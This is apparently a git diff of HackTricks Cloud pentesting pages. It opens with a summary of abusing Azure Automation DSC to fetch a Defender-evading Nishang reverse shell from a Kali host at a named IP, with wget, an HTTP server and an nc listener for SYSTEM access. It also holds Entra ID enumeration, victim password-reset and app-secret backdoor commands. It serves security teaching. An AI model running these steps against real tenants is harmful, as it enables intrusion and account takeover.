+### Summary of Remote Server (C2) Infrastructure Preparation and Steps
+
+#### Overview
+
+The process involves setting up a remote server infrastructure to host a modified Nishang `Invoke-PowerShellTcp.ps1` payload, named `RevPS.ps1`, designed to bypass Windows Defender. The payload is served from a Kali Linux machine with IP `40.84.7.74` using a simple Python HTTP server. The operation is executed through several steps:
+
+#### Step 1 — Create Files
+
+- **Files Required:** Two PowerShell scripts are needed:
+  1. `reverse_shell_config.ps1`: A Desired State Configuration (DSC) file that fetches and executes the payload. It is obtainable from [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/reverse_shell_config.ps1).
+  2. `push_reverse_shell_config.ps1`: A script to publish the configuration to the VM, available at [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/push_reverse_shell_config.ps1).
+- **Customization:** Variables and parameters in these files must be tailored to the user's specific environment, including resource names, file paths, and server/payload identifiers.
+
+#### Step 2 — Zip Configuration File
+
+- The `reverse_shell_config.ps1` is compressed into a `.zip` file, making it ready for transfer to the Azure Storage Account.
+
+```powershell
+Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip
+```
+
+#### Step 3 — Set Storage Context & Upload
+
+- The zipped configuration file is uploaded to a predefined Azure Storage container, azure-pentest, using Azure's Set-AzStorageBlobContent cmdlet.
+
+```powershell
+Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx
+```
+
+#### Step 4 — Prep Kali Box
+
+- The Kali server downloads the RevPS.ps1 payload from a GitHub repository.
+
+```bash
+wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1
+```
+
+- The script is edited to specify the target Windows VM and port for the reverse shell.
+
+#### Step 5 — Publish Configuration File
+
+- The configuration file is executed, resulting in the reverse-shell script being deployed to the specified location on the Windows VM.
+
+#### Step 6 — Host Payload and Setup Listener
+
+- A Python SimpleHTTPServer is started to host the payload, along with a Netcat listener to capture incoming connections.
+
+```bash
+sudo python -m SimpleHTTPServer 80
+sudo nc -nlvp 443
+```
+
+- The scheduled task executes the payload, achieving SYSTEM-level privileges.
+
+#### Conclusion
+
+The successful execution of this process opens numerous possibilities for further actions, such as credential dumping or expanding the attack to multiple VMs. The guide encourages continued learning and creativity in the realm of Azure Automation DSC.
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-services/az-azuread.md b/src/pentesting-cloud/azure-security/az-services/az-azuread.md
similarity index 79%
rename from pentesting-cloud/azure-security/az-services/az-azuread.md
rename to src/pentesting-cloud/azure-security/az-services/az-azuread.md
index 5d2552550..3a5f6aeaf 100644
--- a/pentesting-cloud/azure-security/az-services/az-azuread.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-azuread.md
@@ -1,19 +1,6 @@
 # Az - Entra ID (AzureAD) & Azure IAM
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -25,8 +12,9 @@ Key features of Azure AD involve **multi-factor authentication** and **condition
 
 ### **Connection**
 
-{% tabs %}
-{% tab title="az cli" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 az login #This will open the browser (if not use --use-device-code)
 az login -u  -p  #Specify user and password
@@ -55,9 +43,11 @@ az find "vm" # Find vm commands
 az vm -h # Get subdomains
 az ad user list --query-examples # Get examples
 ```
-{% endtab %}
 
-{% tab title="Mg" %}
+{{#endtab }}
+
+{{#tab name="Mg" }}
+
 ```powershell
 # Login Open browser
 Connect-MgGraph
@@ -82,9 +72,11 @@ Connect-MgGraph -AccessToken $secureToken
 # Find commands
 Find-MgGraphCommand -command *Mg*
 ```
-{% endtab %}
 
-{% tab title="Az PowerShell" %}
+{{#endtab }}
+
+{{#tab name="Az PowerShell" }}
+
 ```powershell
 Connect-AzAccount #Open browser
 # Using credentials
@@ -114,10 +106,11 @@ Get-Command *azad*
 #Cmdlets for other Azure resources have the format *Az*
 Get-Command *az*
 ```
-{% endtab %}
 
-{% tab title="Raw PS" %}
-{% code overflow="wrap" %}
+{{#endtab }}
+
+{{#tab name="Raw PS" }}
+
 ```powershell
 #Using management
 $Token = 'eyJ0eXAi..'
@@ -135,11 +128,11 @@ $RequestParams = @{
 # Using graph
 Invoke-WebRequest -Uri "https://graph.windows.net/myorganization/users?api-version=1.6" -Headers @{Authorization="Bearer {0}" -f $Token}
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="curl" %}
-{% code overflow="wrap" %}
+{{#endtab }}
+
+{{#tab name="curl" }}
+
 ```bash
 # Request tokens to access endpoints
 # ARM
@@ -148,11 +141,11 @@ curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-
 # Vault
 curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="Azure AD" %}
-{% code overflow="wrap" %}
+{{#endtab }}
+
+{{#tab name="Azure AD" }}
+
 ```powershell
 Connect-AzureAD #Open browser
 # Using credentials
@@ -164,9 +157,9 @@ Connect-AzureAD -Credential $creds
 ## AzureAD cannot request tokens, but can use AADGraph and MSGraph tokens to connect
 Connect-AzureAD -AccountId test@corp.onmicrosoft.com -AadAccessToken $token
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 When you **login** via **CLI** into Azure with any program, you are using an **Azure Application** from a **tenant** that belongs to **Microsoft**. These Applications, like the ones you can create in your account, **have a client id**. You **won't be able to see all of them** in the **allowed applications lists** you can see in the console, **but they are allowed by default**.
 
@@ -201,25 +194,28 @@ $token = Invoke-Authorize -Credential $credential `
 
 ### Tenants
 
-{% tabs %}
-{% tab title="az cli" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List tenants
 az account tenant list
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Users
 
 For more information about Entra ID users check:
 
-{% content-ref url="../az-basic-information/" %}
-[az-basic-information](../az-basic-information/)
-{% endcontent-ref %}
+{{#ref}}
+../az-basic-information/
+{{#endref}}
+
+{{#tabs }}
+{{#tab name="az cli" }}
 
-{% tabs %}
-{% tab title="az cli" %}
 ```bash
 # Enumerate users
 az ad user list --output table
@@ -260,9 +256,11 @@ curl -X GET "https://graph.microsoft.com/beta/roleManagement/directory/roleDefin
 -H "Authorization: Bearer $TOKEN" \
 -H "Content-Type: application/json" | jq
 ```
-{% endtab %}
 
-{% tab title="Azure AD" %}
+{{#endtab }}
+
+{{#tab name="Azure AD" }}
+
 ```powershell
 # Enumerate Users
 Get-AzureADUser -All $true
@@ -298,9 +296,11 @@ Get-AzureADUser -ObjectId roygcain@defcorphq.onmicrosoft.com | Get-AzureADUserAp
 $userObj = Get-AzureADUser -Filter "UserPrincipalName eq 'bill@example.com'"
 Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where { $_.Id -eq $userObj.ObjectId } }
 ```
-{% endtab %}
 
-{% tab title="Az PowerShell" %}
+{{#endtab }}
+
+{{#tab name="Az PowerShell" }}
+
 ```powershell
 # Enumerate users
 Get-AzADUser
@@ -312,37 +312,37 @@ Get-AzADUser | ?{$_.Displayname -match "admin"}
 # Get roles assigned to a user
 Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 #### Change User Password
 
-{% code overflow="wrap" %}
 ```powershell
 $password = "ThisIsTheNewPassword.!123" | ConvertTo- SecureString -AsPlainText –Force
 
 (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@corp.onmicrosoft.com"}).ObjectId | Set- AzureADUserPassword -Password $password –Verbose
 ```
-{% endcode %}
 
 ### MFA & Conditional Access Policies
 
 It's highly recommended to add MFA to every user, however, some companies won't set it or might set it with a Conditional Access: The user will be **required MFA if** it logs in from an specific location, browser or **some condition**. These policies, if not configured correctly might be prone to **bypasses**. Check:
 
-{% content-ref url="../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md" %}
-[az-conditional-access-policies-mfa-bypass.md](../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
+{{#endref}}
 
 ### Groups
 
 For more information about Entra ID groups check:
 
-{% content-ref url="../az-basic-information/" %}
-[az-basic-information](../az-basic-information/)
-{% endcontent-ref %}
+{{#ref}}
+../az-basic-information/
+{{#endref}}
+
+{{#tabs }}
+{{#tab name="az cli" }}
 
-{% tabs %}
-{% tab title="az cli" %}
 ```powershell
 # Enumerate groups
 az ad group list
@@ -369,9 +369,11 @@ az role assignment list --include-groups --include-classic-administrators true -
 
 # To get Entra ID roles assigned check how it's done with users and use a group ID
 ```
-{% endtab %}
 
-{% tab title="Azure AD" %}
+{{#endtab }}
+
+{{#tab name="Azure AD" }}
+
 ```powershell
 # Enumerate Groups
 Get-AzureADGroup -All $true
@@ -382,7 +384,7 @@ Get-AzureADGroup -SearchString "admin" | fl #Groups starting by "admin"
 Get-AzureADGroup -All $true |?{$_.Displayname -match "admin"} #Groups with the word "admin"
 # Get groups allowing dynamic membership
 Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}
-# All groups that are from Azure AD 
+# All groups that are from Azure AD
 Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
 # All groups that are synced from on-prem (note that security groups are not synced)
 Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
@@ -397,9 +399,11 @@ Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember
 # Get Apps where a group has a role (role not shown)
 Get-AzureADGroup -ObjectId  | Get-AzureADGroupAppRoleAssignment | fl *
 ```
-{% endtab %}
 
-{% tab title="Az PowerShell" %}
+{{#endtab }}
+
+{{#tab name="Az PowerShell" }}
+
 ```powershell
 # Get all groups
 Get-AzADGroup
@@ -413,38 +417,37 @@ Get-AzADGroupMember -GroupDisplayName 
 # Get roles of group
 Get-AzRoleAssignment -ResourceGroupName 
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 #### Add user to group
 
 Owners of the group can add new users to the group
 
-{% code overflow="wrap" %}
 ```powershell
 Add-AzureADGroupMember -ObjectId  -RefObjectId  -Verbose
 ```
-{% endcode %}
 
-{% hint style="warning" %}
-Groups can be dynamic, which basically means that **if a user fulfil certain conditions it will be added to a group**. Of course, if the conditions are based in **attributes** a **user** can **control**, he could abuse this feature to **get inside other groups**.\
-Check how to abuse dynamic groups in the following page:
-{% endhint %}
+> [!WARNING]
+> Groups can be dynamic, which basically means that **if a user fulfil certain conditions it will be added to a group**. Of course, if the conditions are based in **attributes** a **user** can **control**, he could abuse this feature to **get inside other groups**.\
+> Check how to abuse dynamic groups in the following page:
 
-{% content-ref url="../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md" %}
-[dynamic-groups.md](../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
+{{#endref}}
 
 ### Service Principals
 
 For more information about Entra ID service principals check:
 
-{% content-ref url="../az-basic-information/" %}
-[az-basic-information](../az-basic-information/)
-{% endcontent-ref %}
+{{#ref}}
+../az-basic-information/
+{{#endref}}
+
+{{#tabs }}
+{{#tab name="az cli" }}
 
-{% tabs %}
-{% tab title="az cli" %}
 ```bash
 # Get Service Principals
 az ad sp list --all
@@ -461,9 +464,11 @@ az ad sp list --show-mine
 # Get SPs with generated secret or certificate
 az ad sp list --query '[?length(keyCredentials) > `0` || length(passwordCredentials) > `0`].[displayName, appId, keyCredentials, passwordCredentials]' -o json
 ```
-{% endtab %}
 
-{% tab title="Azure AD" %}
+{{#endtab }}
+
+{{#tab name="Azure AD" }}
+
 ```powershell
 # Get Service Principals
 Get-AzureADServicePrincipal -All $true
@@ -482,9 +487,11 @@ Get-AzureADServicePrincipal -ObjectId  | Get-AzureADServicePrincipalCreatedO
 Get-AzureADServicePrincipal | Get-AzureADServicePrincipalMembership
 Get-AzureADServicePrincipal -ObjectId  | Get-AzureADServicePrincipalMembership |fl *
 ```
-{% endtab %}
 
-{% tab title="Az PowerShell" %}
+{{#endtab }}
+
+{{#tab name="Az PowerShell" }}
+
 ```powershell
 # Get SPs
 Get-AzADServicePrincipal
@@ -495,9 +502,11 @@ Get-AzADServicePrincipal | ?{$_.DisplayName -match "app"}
 # Get roles of a SP
 Get-AzRoleAssignment -ServicePrincipalName 
 ```
-{% endtab %}
 
-{% tab title="Raw" %}
+{{#endtab }}
+
+{{#tab name="Raw" }}
+
 ```powershell
 $Token = 'eyJ0eX..'
 $URI = 'https://graph.microsoft.com/v1.0/applications'
@@ -510,12 +519,12 @@ $RequestParams = @{
 }
 (Invoke-RestMethod @RequestParams).value
 ```
-{% endtab %}
-{% endtabs %}
 
-{% hint style="warning" %}
-The Owner of a Service Principal can change its password.
-{% endhint %}
+{{#endtab }}
+{{#endtabs }}
+
+> [!WARNING]
+> The Owner of a Service Principal can change its password.
 
 

 
@@ -530,7 +539,7 @@ Function Add-AzADAppSecret
         Add client secret to the applications.
 
     .PARAMETER GraphToken
-        Pass the Graph API Token 
+        Pass the Graph API Token
 
     .EXAMPLE
         PS C:\> Add-AzADAppSecret -GraphToken 'eyJ0eX..'
@@ -562,7 +571,7 @@ Function Add-AzADAppSecret
     }
 
     try
-    { 
+    {
         $AppList = Invoke-RestMethod @Params -UseBasicParsing
     }
     catch
@@ -594,7 +603,7 @@ Function Add-AzADAppSecret
                 "displayName" = "Password"
               }
             }
- 
+
             try
             {
                 $AppPassword = Invoke-RestMethod @Params -UseBasicParsing -Body ($Body | ConvertTo-Json)
@@ -607,13 +616,13 @@ Function Add-AzADAppSecret
             }
             catch
             {
-                Write-Output "Failed to add new client secret to '$($App.displayName)' Application." 
+                Write-Output "Failed to add new client secret to '$($App.displayName)' Application."
             }
         }
         if($Details -ne $null)
         {
             Write-Output ""
-            Write-Output "Client secret added to : " 
+            Write-Output "Client secret added to : "
             Write-Output $Details | fl *
         }
     }
@@ -630,17 +639,18 @@ Function Add-AzADAppSecret
 
 For more information about Applications check:
 
-{% content-ref url="../az-basic-information/" %}
-[az-basic-information](../az-basic-information/)
-{% endcontent-ref %}
+{{#ref}}
+../az-basic-information/
+{{#endref}}
 
 When an App is generated 2 types of permissions are given:
 
-* **Permissions** given to the **Service Principal**
-* **Permissions** the **app** can have and use on **behalf of the user**.
+- **Permissions** given to the **Service Principal**
+- **Permissions** the **app** can have and use on **behalf of the user**.
+
+{{#tabs }}
+{{#tab name="az cli" }}
 
-{% tabs %}
-{% tab title="az cli" %}
 ```bash
 # List Apps
 az ad app list
@@ -656,9 +666,11 @@ az ad app list --show-mine
 # Get apps with generated secret or certificate
 az ad app list --query '[?length(keyCredentials) > `0` || length(passwordCredentials) > `0`].[displayName, appId, keyCredentials, passwordCredentials]' -o json
 ```
-{% endtab %}
 
-{% tab title="Azure AD" %}
+{{#endtab }}
+
+{{#tab name="Azure AD" }}
+
 ```powershell
 # List all registered applications
 Get-AzureADApplication -All $true
@@ -669,9 +681,11 @@ Get-AzureADApplication -All $true | %{if(Get-AzureADApplicationPasswordCredentia
 # Get owner of an application
 Get-AzureADApplication -ObjectId  | Get-AzureADApplicationOwner |fl *
 ```
-{% endtab %}
 
-{% tab title="Az PowerShell" %}
+{{#endtab }}
+
+{{#tab name="Az PowerShell" }}
+
 ```powershell
 # Get Apps
 Get-AzADApplication
@@ -682,21 +696,20 @@ Get-AzADApplication | ?{$_.DisplayName -match "app"}
 # Get Apps with password
 Get-AzADAppCredential
 ```
-{% endtab %}
-{% endtabs %}
 
-{% hint style="warning" %}
-An app with the permission **`AppRoleAssignment.ReadWrite`** can **escalate to Global Admin** by grating itself the role.\
-For more information [**check this**](https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48).
-{% endhint %}
+{{#endtab }}
+{{#endtabs }}
 
-{% hint style="info" %}
-A secret string that the application uses to prove its identity when requesting a token is the application password.\
-So, if find this **password** you can access as the **service principal** **inside** the **tenant**.\
-Note that this password is only visible when generated (you could change it but you cannot get it again).\
-The **owner** of the **application** can **add a password** to it (so he can impersonate it).\
-Logins as these service principals are **not marked as risky** and they **won't have MFA.**
-{% endhint %}
+> [!WARNING]
+> An app with the permission **`AppRoleAssignment.ReadWrite`** can **escalate to Global Admin** by grating itself the role.\
+> For more information [**check this**](https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48).
+
+> [!NOTE]
+> A secret string that the application uses to prove its identity when requesting a token is the application password.\
+> So, if find this **password** you can access as the **service principal** **inside** the **tenant**.\
+> Note that this password is only visible when generated (you could change it but you cannot get it again).\
+> The **owner** of the **application** can **add a password** to it (so he can impersonate it).\
+> Logins as these service principals are **not marked as risky** and they **won't have MFA.**
 
 It's possible to find a list of commonly used App IDs that belongs to Microsoft in [https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications](https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications)
 
@@ -704,31 +717,33 @@ It's possible to find a list of commonly used App IDs that belongs to Microsoft
 
 For more information about Managed Identities check:
 
-{% content-ref url="../az-basic-information/" %}
-[az-basic-information](../az-basic-information/)
-{% endcontent-ref %}
+{{#ref}}
+../az-basic-information/
+{{#endref}}
+
+{{#tabs }}
+{{#tab name="az cli" }}
 
-{% tabs %}
-{% tab title="az cli" %}
 ```bash
 # List all manged identities
 az identity list --output table
 # With the principal ID you can continue the enumeration in service principals
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Azure Roles
 
 For more information about Azure roles check:
 
-{% content-ref url="../az-basic-information/" %}
-[az-basic-information](../az-basic-information/)
-{% endcontent-ref %}
+{{#ref}}
+../az-basic-information/
+{{#endref}}
+
+{{#tabs }}
+{{#tab name="az cli" }}
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
 ```bash
 # Get roles
 az role definition list
@@ -750,10 +765,11 @@ az role assignment list --assignee "" --all --output table
 # Get all the roles assigned to a user by filtering
 az role assignment list --all --query "[?principalName=='carlos@carloshacktricks.onmicrosoft.com']" --output table
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="Az PowerShell" %}
+{{#endtab }}
+
+{{#tab name="Az PowerShell" }}
+
 ```powershell
 # Get role assignments on the subscription
 Get-AzRoleDefinition
@@ -763,9 +779,11 @@ Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
 Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
 Get-AzRoleAssignment -Scope /subscriptions//resourceGroups//providers/Microsoft.Compute/virtualMachines/
 ```
-{% endtab %}
 
-{% tab title="Raw" %}
+{{#endtab }}
+
+{{#tab name="Raw" }}
+
 ```powershell
 # Get permissions over a resource using ARM directly
 $Token = (Get-AzAccessToken).Token
@@ -777,22 +795,23 @@ $RequestParams = @{
  'Authorization' = "Bearer $Token"
  }
 }
-(Invoke-RestMethod @RequestParams).value 
+(Invoke-RestMethod @RequestParams).value
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Entra ID Roles
 
 For more information about Azure roles check:
 
-{% content-ref url="../az-basic-information/" %}
-[az-basic-information](../az-basic-information/)
-{% endcontent-ref %}
+{{#ref}}
+../az-basic-information/
+{{#endref}}
+
+{{#tabs }}
+{{#tab name="az cli" }}
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
 ```bash
 # List template Entra ID roles
 az rest --method GET \
@@ -836,10 +855,11 @@ az rest --method GET \
   --query "value[]" \
   --output json
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="Azure AD" %}
+{{#endtab }}
+
+{{#tab name="Azure AD" }}
+
 ```powershell
 # Get all available role templates
 Get-AzureADDirectoryroleTemplate
@@ -854,19 +874,23 @@ Get-AzureADDirectoryRole -ObjectId  | fl
 # Roles of the Administrative Unit (who has permissions over the administrative unit and its members)
 Get-AzureADMSScopedRoleMembership -Id  | fl *
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Devices
 
-{% tabs %}
-{% tab title="az cli" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # If you know how to do this send a PR!
 ```
-{% endtab %}
 
-{% tab title="Azure AD" %}
+{{#endtab }}
+
+{{#tab name="Azure AD" }}
+
 ```powershell
 # Enumerate Devices
 Get-AzureADDevice -All $true | fl *
@@ -885,24 +909,25 @@ Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
 # Get Administrative Units of a device
 Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -ObjectId $_.ObjectId | where {$_.ObjectId -eq $deviceObjId} }
 ```
-{% endtab %}
-{% endtabs %}
 
-{% hint style="warning" %}
-If a device (VM) is **AzureAD joined**, users from AzureAD are going to be **able to login**.\
-Moreover, if the logged user is **Owner** of the device, he is going to be **local admin**.
-{% endhint %}
+{{#endtab }}
+{{#endtabs }}
+
+> [!WARNING]
+> If a device (VM) is **AzureAD joined**, users from AzureAD are going to be **able to login**.\
+> Moreover, if the logged user is **Owner** of the device, he is going to be **local admin**.
 
 ### Administrative Units
 
 For more information about administrative units check:
 
-{% content-ref url="../az-basic-information/" %}
-[az-basic-information](../az-basic-information/)
-{% endcontent-ref %}
+{{#ref}}
+../az-basic-information/
+{{#endref}}
+
+{{#tabs }}
+{{#tab name="az cli" }}
 
-{% tabs %}
-{% tab title="az cli" %}
 ```bash
 # List all administrative units
 az rest --method GET --uri "https://graph.microsoft.com/v1.0/directory/administrativeUnits"
@@ -913,9 +938,11 @@ az rest --method GET --uri "https://graph.microsoft.com/v1.0/directory/administr
 # Get principals with roles over the AU
 az rest --method GET --uri "https://graph.microsoft.com/v1.0/directory/administrativeUnits/a76fd255-3e5e-405b-811b-da85c715ff53/scopedRoleMembers"
 ```
-{% endtab %}
 
-{% tab title="AzureAD" %}
+{{#endtab }}
+
+{{#tab name="AzureAD" }}
+
 ```powershell
 # Get Administrative Units
 Get-AzureADMSAdministrativeUnit
@@ -927,20 +954,21 @@ Get-AzureADMSAdministrativeUnitMember -Id 
 # Get the roles users have over the members of the AU
 Get-AzureADMSScopedRoleMembership -Id  | fl #Get role ID and role members
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ## Entra ID Privilege Escalation
 
-{% content-ref url="../az-privilege-escalation/az-entraid-privesc/" %}
-[az-entraid-privesc](../az-privilege-escalation/az-entraid-privesc/)
-{% endcontent-ref %}
+{{#ref}}
+../az-privilege-escalation/az-entraid-privesc/
+{{#endref}}
 
 ## Azure Privilege Escalation
 
-{% content-ref url="../az-privilege-escalation/az-authorization-privesc.md" %}
-[az-authorization-privesc.md](../az-privilege-escalation/az-authorization-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-privilege-escalation/az-authorization-privesc.md
+{{#endref}}
 
 ## Defensive Mechanisms
 
@@ -953,26 +981,26 @@ Note that the user will also be able to ask to **extend** the time.
 
 Moreover, **PIM send emails** whenever a privileged role is being assigned to someone.
 
-

+

 
 When PIM is enabled it's possible to configure each role with certain requirements like:
 
-* Maximum duration (hours) of activation
-* Require MFA on activation
-* Require Conditional Access acuthenticaiton context
-* Require justification on activation
-* Require ticket information on activation
-* Require approval to activate
-* Max time to expire the elegible assignments 
-* A lot more configuration on when and who to send notifications when certain actions happen with that role
+- Maximum duration (hours) of activation
+- Require MFA on activation
+- Require Conditional Access acuthenticaiton context
+- Require justification on activation
+- Require ticket information on activation
+- Require approval to activate
+- Max time to expire the elegible assignments 
+- A lot more configuration on when and who to send notifications when certain actions happen with that role
 
 ### Conditional Access Policies 
 
 Check:
 
-{% content-ref url="../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md" %}
-[az-conditional-access-policies-mfa-bypass.md](../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
+{{#endref}}
 
 ### Entra Identity Protection 
 
@@ -980,24 +1008,24 @@ Entra Identity Protection is a security service that allows to **detect when a u
 
 It allows the admin to configure it to **block** attempts when the risk is "Low and above", "Medium and above" or "High". Although, by default it's completely **disabled**:
 
-

+

 
-{% hint style="success" %}
-Nowadays it's recommended to add these restrictions via Conditional Access policies where it's possible to configure the same options.
-{% endhint %}
+> [!TIP]
+> Nowadays it's recommended to add these restrictions via Conditional Access policies where it's possible to configure the same options.
 
 ### Entra Password Protection
 
-Entra Password Protection ([https://portal.azure.com/#view/Microsoft\_AAD\_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)) is a security feature that **helps prevent the abuse of weak passwords in by locking out accounts when several unsuccessful login attempts happen**.\
+Entra Password Protection ([https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)) is a security feature that **helps prevent the abuse of weak passwords in by locking out accounts when several unsuccessful login attempts happen**.\
 It also allows to **ban a custom password list** that you need to provide.
 
 It can be **applied both** at the cloud level and on-premises Active Directory.
 
 The default mode is **Audit**:
 
-

+

 
 ## References
 
-* [https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units)
+- [https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units)
 
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-services/az-file-shares.md b/src/pentesting-cloud/azure-security/az-services/az-file-shares.md
similarity index 58%
rename from pentesting-cloud/azure-security/az-services/az-file-shares.md
rename to src/pentesting-cloud/azure-security/az-services/az-file-shares.md
index 5ca733e45..3d6fb67b6 100644
--- a/pentesting-cloud/azure-security/az-services/az-file-shares.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-file-shares.md
@@ -1,19 +1,6 @@
 # Az - File Shares
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -21,32 +8,31 @@ Learn & practice GCP Hacking:  --share-name  --snapshot
 # Download snapshot/backup
 az storage file download-batch -d . --account-name  --source  --snapshot 
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="Az PowerShell" %}
-{% code overflow="wrap" %}
+{{#endtab}}
+
+{{#tab name="Az PowerShell"}}
+
 ```powershell
 Get-AzStorageAccount
 
@@ -93,18 +79,16 @@ Get-AzStorageShare -Context (Get-AzStorageAccount -ResourceGroupName "" -Context (New-AzStorageContext -StorageAccountName "" -StorageAccountKey (Get-AzStorageAccountKey -ResourceGroupName "" -Name "" | Select-Object -ExpandProperty Value) -SnapshotTime "")
 
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
 
-{% hint style="info" %}
-By default `az` cli will use an account key to sign a key and perform the action. To use the Entra ID principal privileges use the parameters `--auth-mode login --enable-file-backup-request-intent`.
-{% endhint %}
+{{#endtab}}
+{{#endtabs}}
 
-{% hint style="success" %}
-Use the param `--account-key` to indicate the account key to use\
-Use the param `--sas-token` with the SAS token to access via a SAS token
-{% endhint %}
+> [!NOTE]
+> By default `az` cli will use an account key to sign a key and perform the action. To use the Entra ID principal privileges use the parameters `--auth-mode login --enable-file-backup-request-intent`.
+
+> [!TIP]
